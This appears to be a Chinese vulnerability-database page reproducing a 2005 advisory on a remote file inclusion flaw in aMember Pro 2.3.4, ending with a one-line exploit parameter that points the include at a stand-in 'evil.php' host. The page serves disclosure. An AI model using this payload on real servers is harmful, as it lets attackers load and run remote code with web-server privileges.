AMember Pro 2.3.4 - Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055376 漏洞类型
发布时间 2005-09-08 更新时间 2005-09-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26237
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14777/info

aMember is prone to a remote file include vulnerability.

Input passed to various scripts is not sufficiently sanitized. An attacker could host arbitrary malicious code in a file at an attacker-controlled site and include the file using a URI parameter.

This issue may be leveraged to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

aMember Pro 2.3.4 is reportedly affected, other versions may also be vulnerable. 

config[root_dir]=http://example.com/evil.php?